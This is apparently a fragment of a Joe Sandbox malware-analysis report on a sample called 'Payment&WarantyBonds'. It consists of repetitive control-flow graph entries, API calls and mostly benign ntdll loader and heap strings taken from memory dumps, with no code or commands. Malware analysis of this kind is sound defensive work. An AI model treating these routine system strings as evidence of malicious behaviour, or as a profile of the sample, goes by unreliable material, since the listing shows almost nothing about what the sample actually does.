                                                                                                                                                                                • API String ID: 3298025750-0

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                control_flow_graph 191 42c7b3-42c7f7 call 404653 call 42d6c3 RtlAllocateHeap
                                                                                                                                                                                APIs
                                                                                                                                                                                • RtlAllocateHeap.NTDLL(?,0041E40B,?,?,00000000,?,0041E40B,?,?,?), ref: 0042C7F2
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2062501078.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_400000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: AllocateHeap
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1279760036-0

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                control_flow_graph 206 42c853-42c88f call 404653 call 42d6c3 ExitProcess
                                                                                                                                                                                APIs
                                                                                                                                                                                • ExitProcess.KERNEL32(?,00000000,00000000,?,B5727CFB,?,?,B5727CFB), ref: 0042C88A
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2062501078.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_400000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ExitProcess
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 621844428-0

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                control_flow_graph 211 1462c0a-1462c0f 212 1462c11-1462c18 211->212 213 1462c1f-1462c26 LdrInitializeThunk 211->213
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2063188272.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_13f0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2063188272.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_13f0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                                                                                                                                                • API String ID: 0-2160512332
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2063188272.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_13f0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: Free Heap block %p modified at %p after it was freed$HEAP: $HEAP[%wZ]: $Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x)$Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x)$Heap block at %p has corrupted PreviousSize (%lx)$Heap block at %p has incorrect segment offset (%x)$Heap block at %p is not last block in segment (%p)$Heap entry %p has incorrect PreviousSize field (%04x instead of %04x)
                                                                                                                                                                                • API String ID: 0-3591852110
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2063188272.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_13f0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: @$@$@$Control Panel\Desktop$Control Panel\Desktop\MuiCached$MachinePreferredUILanguages$PreferredUILanguages$PreferredUILanguagesPending$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings
                                                                                                                                                                                • API String ID: 0-3532704233
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2063188272.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_13f0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: %s\%ld\%s$%s\%u-%u-%u-%u$AppContainerNamedObjects$BaseNamedObjects$Global\Session\%ld%s$\AppContainerNamedObjects$\BaseNamedObjects$\Sessions
                                                                                                                                                                                • API String ID: 0-3063724069
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2063188272.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_13f0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                                                                                                                                                • API String ID: 0-1700792311
                                                                                                                                                                                Strings
                                                                                                                                                                                • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration, xrefs: 0141D2C3
                                                                                                                                                                                • Control Panel\Desktop\MuiCached\MachineLanguageConfiguration, xrefs: 0141D262
                                                                                                                                                                                • \Registry\Machine\Software\Policies\Microsoft\MUI\Settings, xrefs: 0141D0CF
                                                                                                                                                                                • @, xrefs: 0141D313
                                                                                                                                                                                • Control Panel\Desktop\LanguageConfiguration, xrefs: 0141D196
                                                                                                                                                                                • @, xrefs: 0141D2AF
                                                                                                                                                                                • Software\Policies\Microsoft\Control Panel\Desktop, xrefs: 0141D146
                                                                                                                                                                                • @, xrefs: 0141D0FD
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2063188272.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_13f0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: @$@$@$Control Panel\Desktop\LanguageConfiguration$Control Panel\Desktop\MuiCached\MachineLanguageConfiguration$Software\Policies\Microsoft\Control Panel\Desktop$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2063188272.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_13f0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2063188272.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_13f0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: API set$DLL %wZ was redirected to %wZ by %s$LdrpPreprocessDllName$LdrpPreprocessDllName for DLL %wZ failed with status 0x%08lx$SxS$minkernel\ntdll\ldrutil.c
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2063188272.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_13f0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2063188272.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_13f0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just allocated block at %p for %Ix bytes$Just allocated block at %p for 0x%Ix bytes with tag %ws$RtlAllocateHeap
                                                                                                                                                                                Strings
                                                                                                                                                                                • apphelp.dll, xrefs: 01416496
                                                                                                                                                                                • Getting the shim engine exports failed with status 0x%08lx, xrefs: 01479A01
                                                                                                                                                                                • LdrpInitShimEngine, xrefs: 014799F4, 01479A07, 01479A30
                                                                                                                                                                                • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 014799ED
                                                                                                                                                                                • minkernel\ntdll\ldrinit.c, xrefs: 01479A11, 01479A3A
                                                                                                                                                                                • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 01479A2A
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2063188272.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_13f0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                                                                                                                Strings
                                                                                                                                                                                • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 014902E7
                                                                                                                                                                                • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 014902BD
                                                                                                                                                                                • RTL: Re-Waiting, xrefs: 0149031E
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2063188272.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_13f0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                                                                                                                Strings
                                                                                                                                                                                • WindowsExcludedProcs, xrefs: 0144522A
                                                                                                                                                                                • Kernel-MUI-Language-SKU, xrefs: 0144542B
                                                                                                                                                                                • Kernel-MUI-Language-Disallowed, xrefs: 01445352
                                                                                                                                                                                • Kernel-MUI-Language-Allowed, xrefs: 0144527B
                                                                                                                                                                                • Kernel-MUI-Number-Allowed, xrefs: 01445247
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2063188272.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_13f0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2063188272.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_13f0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2063188272.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_13f0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: !(CheckedFlags & ~HEAP_CREATE_VALID_MASK)$@$HEAP: $HEAP[%wZ]:
                                                                                                                                                                                • API String ID: 0-3570731704
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2063188272.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                                                                                                                                                • API String ID: 0-379654539
                                                                                                                                                                                Strings
                                                                                                                                                                                • LdrpInitializeProcess, xrefs: 01458422
                                                                                                                                                                                • minkernel\ntdll\ldrinit.c, xrefs: 01458421
                                                                                                                                                                                • @, xrefs: 01458591
                                                                                                                                                                                • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 0145855E
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2063188272.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                                                                                                                                                • API String ID: 0-1918872054
                                                                                                                                                                                Strings
                                                                                                                                                                                • minkernel\ntdll\ldrmap.c, xrefs: 0148A59A
                                                                                                                                                                                • Could not validate the crypto signature for DLL %wZ, xrefs: 0148A589
                                                                                                                                                                                • LdrpCompleteMapModule, xrefs: 0148A590
                                                                                                                                                                                • MZER, xrefs: 014416E8
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2063188272.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$MZER$minkernel\ntdll\ldrmap.c
                                                                                                                                                                                • API String ID: 0-1409021520
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2063188272.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: This is located in the %s field of the heap header.$HEAP: $HEAP[%wZ]: $Heap %p - headers modified (%p is %lx instead of %lx)
                                                                                                                                                                                • API String ID: 0-336120773
                                                                                                                                                                                Strings
                                                                                                                                                                                • LdrpDynamicShimModule, xrefs: 0148A998
                                                                                                                                                                                • apphelp.dll, xrefs: 01442462
                                                                                                                                                                                • minkernel\ntdll\ldrinit.c, xrefs: 0148A9A2
                                                                                                                                                                                • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 0148A992
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2063188272.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                                                                                                                • API String ID: 0-176724104
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2063188272.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: HEAP: $HEAP[%wZ]: $VirtualProtect Failed 0x%p %x$VirtualQuery Failed 0x%p %x
                                                                                                                                                                                • API String ID: 0-1391187441
                                                                                                                                                                                Strings
                                                                                                                                                                                • HEAP: , xrefs: 01421596
                                                                                                                                                                                • HEAP: Free Heap block %p modified at %p after it was freed, xrefs: 01421728
                                                                                                                                                                                • HEAP[%wZ]: , xrefs: 01421712
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2063188272.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                                                                                                                                                • API String ID: 0-3178619729
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2063188272.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: FilterFullPath$UseFilter$\??\
                                                                                                                                                                                • API String ID: 0-2779062949
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2063188272.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: Objects=%4u$Objects>%4u$VirtualAlloc
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2063188272.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_13f0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: LdrpResGetResourceDirectory Enter$LdrpResGetResourceDirectory Exit${
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2063188272.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_13f0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: %$&$@
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2063188272.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_13f0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: HEAP: $HEAP[%wZ]: $Invalid address specified to %s( %p, %p )
                                                                                                                                                                                Strings
                                                                                                                                                                                • @, xrefs: 014DC1F1
                                                                                                                                                                                • PreferredUILanguages, xrefs: 014DC212
                                                                                                                                                                                • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 014DC1C5
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2063188272.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_13f0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2063188272.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_13f0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                                                                                                                                                Strings
                                                                                                                                                                                • RtlCreateActivationContext, xrefs: 014929F9
                                                                                                                                                                                • SXS: %s() passed the empty activation context data, xrefs: 014929FE
                                                                                                                                                                                • Actx , xrefs: 014533AC
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2063188272.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_13f0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: Actx $RtlCreateActivationContext$SXS: %s() passed the empty activation context data
                                                                                                                                                                                Strings
                                                                                                                                                                                • @, xrefs: 014AB670
                                                                                                                                                                                • \Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\, xrefs: 014AB632
                                                                                                                                                                                • GlobalFlag, xrefs: 014AB68F
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2063188272.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_13f0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: @$GlobalFlag$\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\
                                                                                                                                                                                Strings
                                                                                                                                                                                • @, xrefs: 014612A5
                                                                                                                                                                                • BuildLabEx, xrefs: 0146130F
                                                                                                                                                                                • \Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion, xrefs: 0146127B
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2063188272.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_13f0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: @$BuildLabEx$\Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                                                                                                                                                                Strings
                                                                                                                                                                                • Process initialization failed with status 0x%08lx, xrefs: 014A20F3
                                                                                                                                                                                • minkernel\ntdll\ldrinit.c, xrefs: 014A2104
                                                                                                                                                                                • LdrpInitializationFailure, xrefs: 014A20FA
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2063188272.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_13f0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2063188272.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_13f0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ___swprintf_l
                                                                                                                                                                                • String ID: #%u
                                                                                                                                                                                • API String ID: 48624451-232158463
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2063188272.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: @$@
                                                                                                                                                                                • API String ID: 0-149943524
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2063188272.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: `$`
                                                                                                                                                                                • API String ID: 0-197956300
                                                                                                                                                                                Strings
                                                                                                                                                                                • RtlpResUltimateFallbackInfo Enter, xrefs: 0142A2FB
                                                                                                                                                                                • RtlpResUltimateFallbackInfo Exit, xrefs: 0142A309
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2063188272.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                                                                                                                                                • API String ID: 0-2876891731
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2063188272.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit
                                                                                                                                                                                • API String ID: 0-118005554
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2063188272.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: .Local\$@
                                                                                                                                                                                • API String ID: 0-380025441
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2063188272.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                • String ID: Cleanup Group$Threadpool!
                                                                                                                                                                                • API String ID: 2994545307-4008356553
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2063188272.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
